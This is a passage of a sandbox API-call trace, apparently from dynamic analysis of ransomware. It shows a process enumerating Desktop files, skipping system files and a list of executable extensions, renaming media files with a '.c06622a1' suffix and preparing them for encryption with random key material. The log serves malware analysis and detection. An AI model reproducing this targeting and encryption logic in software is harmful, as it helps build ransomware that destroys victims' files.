returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\Z6MOpJ7HjT.mkv" [0148.284] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\Z6MOpJ7HjT.mkv") returned 0x44 [0148.284] wcscpy (in: _Dest=0x4510120, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.284] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\Z6MOpJ7HjT.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\z6mopj7hjt.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\Z6MOpJ7HjT.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\z6mopj7hjt.mkv.c06622a1"), dwFlags=0x8) returned 1 [0148.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\Z6MOpJ7HjT.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\z6mopj7hjt.mkv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x644 [0148.286] CreateIoCompletionPort (FileHandle=0x644, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0148.286] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4820020 [0148.291] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xaf3e074 [0148.291] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7f1c1e44 [0148.291] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1ae06522 [0148.291] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xc2451e0 [0148.291] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5a4bf44b [0148.291] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5089ffaf [0148.291] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x68840082 [0148.291] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1005deea [0148.294] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4820094, Length=0x80) returned 0x11218c07 [0148.294] RtlComputeCrc32 (PartialCrc=0x8c07, Buffer=0x4820094, Length=0x80) returned 0x68069b5d [0148.294] RtlComputeCrc32 (PartialCrc=0x9b5d, Buffer=0x4820094, Length=0x80) returned 0x1c6a32c1 [0148.294] RtlComputeCrc32 (PartialCrc=0x32c1, Buffer=0x4820094, Length=0x80) returned 0xcf864f5e [0148.294] RtlComputeCrc32 (PartialCrc=0x4f5e, Buffer=0x4820094, Length=0x80) returned 0x1db27d2d [0148.294] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4820020) returned 1 [0148.294] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0148.294] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0148.294] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0148.294] FindClose (in: hFindFile=0x2db8780 | out: hFindFile=0x2db8780) returned 1 [0148.294] _wcsicmp (_Str1="backup", _Str2="Id8szDz7a0w") returned -7 [0148.294] wcslen (_String="backup") returned 0x6 [0148.295] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.296] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.297] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d9d15d0, ftCreationTime.dwHighDateTime=0x1d5e1db, ftLastAccessTime.dwLowDateTime=0x632114a0, ftLastAccessTime.dwHighDateTime=0x1d5e72b, ftLastWriteTime.dwLowDateTime=0x632114a0, ftLastWriteTime.dwHighDateTime=0x1d5e72b, nFileSizeHigh=0x0, nFileSizeLow=0x2f40, dwReserved0=0x0, dwReserved1=0x0, cFileName="igDMSrqHNIXR.mp3", cAlternateFileName="IGDMSR~1.MP3")) returned 1 [0148.297] _wcsicmp (_Str1="igDMSrqHNIXR.mp3", _Str2="README.c06622a1.TXT") returned -9 [0148.297] wcsstr (_Str="igDMSrqHNIXR.mp3", _SubStr="README") returned 0x0 [0148.297] _wcsicmp (_Str1="autorun.inf", _Str2="igDMSrqHNIXR.mp3") returned -8 [0148.297] wcslen (_String="autorun.inf") returned 0xb [0148.297] _wcsicmp (_Str1="boot.ini", _Str2="igDMSrqHNIXR.mp3") returned -7 [0148.297] wcslen (_String="boot.ini") returned 0x8 [0148.297] _wcsicmp (_Str1="bootfont.bin", _Str2="igDMSrqHNIXR.mp3") returned -7 [0148.297] wcslen (_String="bootfont.bin") returned 0xc [0148.297] _wcsicmp (_Str1="bootsect.bak", _Str2="igDMSrqHNIXR.mp3") returned -7 [0148.297] wcslen (_String="bootsect.bak") returned 0xc [0148.297] _wcsicmp (_Str1="desktop.ini", _Str2="igDMSrqHNIXR.mp3") returned -5 [0148.297] wcslen (_String="desktop.ini") returned 0xb [0148.297] _wcsicmp (_Str1="iconcache.db", _Str2="igDMSrqHNIXR.mp3") returned -4 [0148.297] wcslen (_String="iconcache.db") returned 0xc [0148.297] _wcsicmp (_Str1="ntldr", _Str2="igDMSrqHNIXR.mp3") returned 5 [0148.297] wcslen (_String="ntldr") returned 0x5 [0148.297] _wcsicmp (_Str1="ntuser.dat", _Str2="igDMSrqHNIXR.mp3") returned 5 [0148.297] wcslen (_String="ntuser.dat") returned 0xa [0148.297] _wcsicmp (_Str1="ntuser.dat.log", _Str2="igDMSrqHNIXR.mp3") returned 5 [0148.297] wcslen (_String="ntuser.dat.log") returned 0xe [0148.297] _wcsicmp (_Str1="ntuser.ini", _Str2="igDMSrqHNIXR.mp3") returned 5 [0148.297] wcslen (_String="ntuser.ini") returned 0xa [0148.297] _wcsicmp (_Str1="thumbs.db", _Str2="igDMSrqHNIXR.mp3") returned 11 [0148.298] wcslen (_String="thumbs.db") returned 0x9 [0148.298] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0148.298] wcslen (_String="386") returned 0x3 [0148.298] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0148.298] wcslen (_String="adv") returned 0x3 [0148.298] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0148.298] wcslen (_String="ani") returned 0x3 [0148.298] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0148.298] wcslen (_String="bat") returned 0x3 [0148.298] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0148.298] wcslen (_String="bin") returned 0x3 [0148.298] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0148.298] wcslen (_String="cab") returned 0x3 [0148.298] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0148.298] wcslen (_String="cmd") returned 0x3 [0148.298] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0148.298] wcslen (_String="com") returned 0x3 [0148.298] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0148.298] wcslen (_String="cpl") returned 0x3 [0148.298] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0148.298] wcslen (_String="cur") returned 0x3 [0148.298] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0148.298] wcslen (_String="deskthemepack") returned 0xd [0148.298] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0148.298] wcslen (_String="diagcab") returned 0x7 [0148.298] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0148.298] wcslen (_String="diagcfg") returned 0x7 [0148.298] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0148.298] wcslen (_String="diagpkg") returned 0x7 [0148.298] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0148.298] wcslen (_String="dll") returned 0x3 [0148.298] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0148.298] wcslen (_String="drv") returned 0x3 [0148.298] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0148.298] wcslen (_String="exe") returned 0x3 [0148.298] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0148.298] wcslen (_String="hlp") returned 0x3 [0148.298] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0148.299] wcslen (_String="icl") returned 0x3 [0148.299] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0148.299] wcslen (_String="icns") returned 0x4 [0148.299] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0148.299] wcslen (_String="ico") returned 0x3 [0148.299] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0148.299] wcslen (_String="ics") returned 0x3 [0148.299] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0148.299] wcslen (_String="idx") returned 0x3 [0148.299] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0148.299] wcslen (_String="ldf") returned 0x3 [0148.299] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0148.299] wcslen (_String="lnk") returned 0x3 [0148.299] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0148.299] wcslen (_String="mod") returned 0x3 [0148.299] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0148.299] wcslen (_String="mpa") returned 0x3 [0148.299] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0148.299] wcslen (_String="msc") returned 0x3 [0148.299] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0148.299] wcslen (_String="msp") returned 0x3 [0148.299] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0148.299] wcslen (_String="msstyles") returned 0x8 [0148.299] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0148.299] wcslen (_String="msu") returned 0x3 [0148.299] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0148.299] wcslen (_String="nls") returned 0x3 [0148.299] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0148.299] wcslen (_String="nomedia") returned 0x7 [0148.299] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0148.299] wcslen (_String="ocx") returned 0x3 [0148.299] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0148.299] wcslen (_String="prf") returned 0x3 [0148.299] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0148.299] wcslen (_String="ps1") returned 0x3 [0148.299] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0148.299] wcslen (_String="rom") returned 0x3 [0148.299] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0148.300] wcslen (_String="rtp") returned 0x3 [0148.300] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0148.300] wcslen (_String="scr") returned 0x3 [0148.300] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0148.300] wcslen (_String="shs") returned 0x3 [0148.300] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0148.300] wcslen (_String="spl") returned 0x3 [0148.300] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0148.300] wcslen (_String="sys") returned 0x3 [0148.300] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0148.300] wcslen (_String="theme") returned 0x5 [0148.300] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0148.300] wcslen (_String="themepack") returned 0x9 [0148.300] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0148.300] wcslen (_String="wpx") returned 0x3 [0148.300] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0148.300] wcslen (_String="lock") returned 0x4 [0148.300] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0148.300] wcslen (_String="key") returned 0x3 [0148.300] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0148.300] wcslen (_String="hta") returned 0x3 [0148.300] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0148.300] wcslen (_String="msi") returned 0x3 [0148.300] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0148.300] wcslen (_String="pdb") returned 0x3 [0148.300] _wcsicmp (_Str1="sql", _Str2="mp3") returned 6 [0148.300] wcslen (_String="sql") returned 0x3 [0148.300] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0148.300] wcslen (_String="sqlite") returned 0x6 [0148.300] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0148.300] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.301] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0148.301] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0148.301] wcscpy (in: _Dest=0x44d00cc, _Source="igDMSrqHNIXR.mp3" | out: _Dest="igDMSrqHNIXR.mp3") returned="igDMSrqHNIXR.mp3" [0148.301] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\igDMSrqHNIXR.mp3", dwFileAttributes=0x80) returned 1 [0148.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\igDMSrqHNIXR.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\igdmsrqhnixr.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x65c [0148.301] SetFilePointerEx (in: hFile=0x65c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.301] ReadFile (in: hFile=0x65c, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.302] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xab6f9a5f [0148.302] RtlComputeCrc32 (PartialCrc=0x9a5f, Buffer=0x3feb74, Length=0x80) returned 0x119e38ad [0148.302] RtlComputeCrc32 (PartialCrc=0x38ad, Buffer=0x3feb74, Length=0x80) returned 0xbbe77f22 [0148.302] RtlComputeCrc32 (PartialCrc=0x7f22, Buffer=0x3feb74, Length=0x80) returned 0x324c44aa [0148.302] RtlComputeCrc32 (PartialCrc=0x44aa, Buffer=0x3feb74, Length=0x80) returned 0x26732be0 [0148.302] CloseHandle (hObject=0x65c) returned 1 [0148.302] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.302] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\igDMSrqHNIXR.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\igDMSrqHNIXR.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\igDMSrqHNIXR.mp3" [0148.302] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\igDMSrqHNIXR.mp3") returned 0x3a [0148.302] wcscpy (in: _Dest=0x44e00f4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.303] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\igDMSrqHNIXR.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\igdmsrqhnixr.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\igDMSrqHNIXR.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\igdmsrqhnixr.mp3.c06622a1"), dwFlags=0x8) returned 1 [0148.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\igDMSrqHNIXR.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\igdmsrqhnixr.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x65c [0148.305] CreateIoCompletionPort (FileHandle=0x65c, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0148.305] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x48b0020 [0148.310] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x21043f81 [0148.311] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x25727407 [0148.311] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5ff6d891 [0148.311] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6765f4e0 [0148.311] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7d04329d [0148.311] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x403110ad [0148.311] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5dfe0ac1 [0148.311] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x55321599 [0148.314] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x48b0094, Length=0x80) returned 0xe0387fbb [0148.314] RtlComputeCrc32 (PartialCrc=0x7fbb, Buffer=0x48b0094, Length=0x80) returned 0xf7f4e8bc [0148.314] RtlComputeCrc32 (PartialCrc=0xe8bc, Buffer=0x48b0094, Length=0x80) returned 0x24dc2feb [0148.314] RtlComputeCrc32 (PartialCrc=0x2feb, Buffer=0x48b0094, Length=0x80) returned 0xe9f53d85 [0148.314] RtlComputeCrc32 (PartialCrc=0x3d85, Buffer=0x48b0094, Length=0x80) returned 0x7e5ff613 [0148.314] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x48b0020) returned 1 [0148.314] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.314] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.315] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eb312a0, ftCreationTime.dwHighDateTime=0x1d5dbc0, ftLastAccessTime.dwLowDateTime=0xe0f28de0, ftLastAccessTime.dwHighDateTime=0x1d5e41b, ftLastWriteTime.dwLowDateTime=0xe0f28de0, ftLastWriteTime.dwHighDateTime=0x1d5e41b, nFileSizeHigh=0x0, nFileSizeLow=0xffdf, dwReserved0=0x0, dwReserved1=0x0, cFileName="iwHN9FuwRsyWXuAnhp.mkv", cAlternateFileName="IWHN9F~1.MKV")) returned 1 [0148.315] _wcsicmp (_Str1="iwHN9FuwRsyWXuAnhp.mkv", _Str2="README.c06622a1.TXT") returned -9 [0148.315] wcsstr (_Str="iwHN9FuwRsyWXuAnhp.mkv", _SubStr="README") returned 0x0 [0148.315] _wcsicmp (_Str1="autorun.inf", _Str2="iwHN9FuwRsyWXuAnhp.mkv") returned -8 [0148.315] wcslen (_String="autorun.inf") returned 0xb [0148.315] _wcsicmp (_Str1="boot.ini", _Str2="iwHN9FuwRsyWXuAnhp.mkv") returned -7 [0148.316] wcslen (_String="boot.ini") returned 0x8 [0148.316] _wcsicmp (_Str1="bootfont.bin", _Str2="iwHN9FuwRsyWXuAnhp.mkv") returned -7 [0148.316] wcslen (_String="bootfont.bin") returned 0xc [0148.316] _wcsicmp (_Str1="bootsect.bak", _Str2="iwHN9FuwRsyWXuAnhp.mkv") returned -7 [0148.316] wcslen (_String="bootsect.bak") returned 0xc [0148.316] _wcsicmp (_Str1="desktop.ini", _Str2="iwHN9FuwRsyWXuAnhp.mkv") returned -5 [0148.316] wcslen (_String="desktop.ini") returned 0xb [0148.316] _wcsicmp (_Str1="iconcache.db", _Str2="iwHN9FuwRsyWXuAnhp.mkv") returned -20 [0148.316] wcslen (_String="iconcache.db") returned 0xc [0148.316] _wcsicmp (_Str1="ntldr", _Str2="iwHN9FuwRsyWXuAnhp.mkv") returned 5 [0148.316] wcslen (_String="ntldr") returned 0x5 [0148.316] _wcsicmp (_Str1="ntuser.dat", _Str2="iwHN9FuwRsyWXuAnhp.mkv") returned 5 [0148.316] wcslen (_String="ntuser.dat") returned 0xa [0148.316] _wcsicmp (_Str1="ntuser.dat.log", _Str2="iwHN9FuwRsyWXuAnhp.mkv") returned 5 [0148.316] wcslen (_String="ntuser.dat.log") returned 0xe [0148.316] _wcsicmp (_Str1="ntuser.ini", _Str2="iwHN9FuwRsyWXuAnhp.mkv") returned 5 [0148.316] wcslen (_String="ntuser.ini") returned 0xa [0148.316] _wcsicmp (_Str1="thumbs.db", _Str2="iwHN9FuwRsyWXuAnhp.mkv") returned 11 [0148.316] wcslen (_String="thumbs.db") returned 0x9 [0148.317] _wcsicmp (_Str1="386", _Str2="mkv") returned -58 [0148.317] wcslen (_String="386") returned 0x3 [0148.317] _wcsicmp (_Str1="adv", _Str2="mkv") returned -12 [0148.317] wcslen (_String="adv") returned 0x3 [0148.317] _wcsicmp (_Str1="ani", _Str2="mkv") returned -12 [0148.317] wcslen (_String="ani") returned 0x3 [0148.317] _wcsicmp (_Str1="bat", _Str2="mkv") returned -11 [0148.317] wcslen (_String="bat") returned 0x3 [0148.317] _wcsicmp (_Str1="bin", _Str2="mkv") returned -11 [0148.317] wcslen (_String="bin") returned 0x3 [0148.317] _wcsicmp (_Str1="cab", _Str2="mkv") returned -10 [0148.317] wcslen (_String="cab") returned 0x3 [0148.317] _wcsicmp (_Str1="cmd", _Str2="mkv") returned -10 [0148.317] wcslen (_String="cmd") returned 0x3 [0148.317] _wcsicmp (_Str1="com", _Str2="mkv") returned -10 [0148.317] wcslen (_String="com") returned 0x3 [0148.317] _wcsicmp (_Str1="cpl", _Str2="mkv") returned -10 [0148.317] wcslen (_String="cpl") returned 0x3 [0148.317] _wcsicmp (_Str1="cur", _Str2="mkv") returned -10 [0148.317] wcslen (_String="cur") returned 0x3 [0148.317] _wcsicmp (_Str1="deskthemepack", _Str2="mkv") returned -9 [0148.317] wcslen (_String="deskthemepack") returned 0xd [0148.317] _wcsicmp (_Str1="diagcab", _Str2="mkv") returned -9 [0148.317] wcslen (_String="diagcab") returned 0x7 [0148.317] _wcsicmp (_Str1="diagcfg", _Str2="mkv") returned -9 [0148.317] wcslen (_String="diagcfg") returned 0x7 [0148.317] _wcsicmp (_Str1="diagpkg", _Str2="mkv") returned -9 [0148.317] wcslen (_String="diagpkg") returned 0x7 [0148.317] _wcsicmp (_Str1="dll", _Str2="mkv") returned -9 [0148.317] wcslen (_String="dll") returned 0x3 [0148.317] _wcsicmp (_Str1="drv", _Str2="mkv") returned -9 [0148.317] wcslen (_String="drv") returned 0x3 [0148.317] _wcsicmp (_Str1="exe", _Str2="mkv") returned -8 [0148.317] wcslen (_String="exe") returned 0x3 [0148.317] _wcsicmp (_Str1="hlp", _Str2="mkv") returned -5 [0148.317] wcslen (_String="hlp") returned 0x3 [0148.317] _wcsicmp (_Str1="icl", _Str2="mkv") returned -4 [0148.318] wcslen (_String="icl") returned 0x3 [0148.318] _wcsicmp (_Str1="icns", _Str2="mkv") returned -4 [0148.318] wcslen (_String="icns") returned 0x4 [0148.318] _wcsicmp (_Str1="ico", _Str2="mkv") returned -4 [0148.318] wcslen (_String="ico") returned 0x3 [0148.318] _wcsicmp (_Str1="ics", _Str2="mkv") returned -4 [0148.318] wcslen (_String="ics") returned 0x3 [0148.318] _wcsicmp (_Str1="idx", _Str2="mkv") returned -4 [0148.318] wcslen (_String="idx") returned 0x3 [0148.318] _wcsicmp (_Str1="ldf", _Str2="mkv") returned -1 [0148.318] wcslen (_String="ldf") returned 0x3 [0148.318] _wcsicmp (_Str1="lnk", _Str2="mkv") returned -1 [0148.318] wcslen (_String="lnk") returned 0x3 [0148.318] _wcsicmp (_Str1="mod", _Str2="mkv") returned 4 [0148.318] wcslen (_String="mod") returned 0x3 [0148.318] _wcsicmp (_Str1="mpa", _Str2="mkv") returned 5 [0148.318] wcslen (_String="mpa") returned 0x3 [0148.318] _wcsicmp (_Str1="msc", _Str2="mkv") returned 8 [0148.318] wcslen (_String="msc") returned 0x3 [0148.318] _wcsicmp (_Str1="msp", _Str2="mkv") returned 8 [0148.318] wcslen (_String="msp") returned 0x3 [0148.318] _wcsicmp (_Str1="msstyles", _Str2="mkv") returned 8 [0148.318] wcslen (_String="msstyles") returned 0x8 [0148.318] _wcsicmp (_Str1="msu", _Str2="mkv") returned 8 [0148.318] wcslen (_String="msu") returned 0x3 [0148.318] _wcsicmp (_Str1="nls", _Str2="mkv") returned 1 [0148.318] wcslen (_String="nls") returned 0x3 [0148.318] _wcsicmp (_Str1="nomedia", _Str2="mkv") returned 1 [0148.318] wcslen (_String="nomedia") returned 0x7 [0148.318] _wcsicmp (_Str1="ocx", _Str2="mkv") returned 2 [0148.318] wcslen (_String="ocx") returned 0x3 [0148.318] _wcsicmp (_Str1="prf", _Str2="mkv") returned 3 [0148.318] wcslen (_String="prf") returned 0x3 [0148.318] _wcsicmp (_Str1="ps1", _Str2="mkv") returned 3 [0148.318] wcslen (_String="ps1") returned 0x3 [0148.318] _wcsicmp (_Str1="rom", _Str2="mkv") returned 5 [0148.318] wcslen (_String="rom") returned 0x3 [0148.318] _wcsicmp (_Str1="rtp", _Str2="mkv") returned 5 [0148.319] wcslen (_String="rtp") returned 0x3 [0148.319] _wcsicmp (_Str1="scr", _Str2="mkv") returned 6 [0148.319] wcslen (_String="scr") returned 0x3 [0148.319] _wcsicmp (_Str1="shs", _Str2="mkv") returned 6 [0148.319] wcslen (_String="shs") returned 0x3 [0148.319] _wcsicmp (_Str1="spl", _Str2="mkv") returned 6 [0148.319] wcslen (_String="spl") returned 0x3 [0148.319] _wcsicmp (_Str1="sys", _Str2="mkv") returned 6 [0148.319] wcslen (_String="sys") returned 0x3 [0148.319] _wcsicmp (_Str1="theme", _Str2="mkv") returned 7 [0148.319] wcslen (_String="theme") returned 0x5 [0148.319] _wcsicmp (_Str1="themepack", _Str2="mkv") returned 7 [0148.319] wcslen (_String="themepack") returned 0x9 [0148.319] _wcsicmp (_Str1="wpx", _Str2="mkv") returned 10 [0148.319] wcslen (_String="wpx") returned 0x3 [0148.319] _wcsicmp (_Str1="lock", _Str2="mkv") returned -1 [0148.319] wcslen (_String="lock") returned 0x4 [0148.319] _wcsicmp (_Str1="key", _Str2="mkv") returned -2 [0148.319] wcslen (_String="key") returned 0x3 [0148.319] _wcsicmp (_Str1="hta", _Str2="mkv") returned -5 [0148.319] wcslen (_String="hta") returned 0x3 [0148.319] _wcsicmp (_Str1="msi", _Str2="mkv") returned 8 [0148.319] wcslen (_String="msi") returned 0x3 [0148.319] _wcsicmp (_Str1="pdb", _Str2="mkv") returned 3 [0148.319] wcslen (_String="pdb") returned 0x3 [0148.319] _wcsicmp (_Str1="sql", _Str2="mkv") returned 6 [0148.319] wcslen (_String="sql") returned 0x3 [0148.319] _wcsicmp (_Str1="sqlite", _Str2="mkv") returned 6 [0148.319] wcslen (_String="sqlite") returned 0x6 [0148.319] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0148.319] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.319] wcscpy (in: _Dest=0x44d0078, 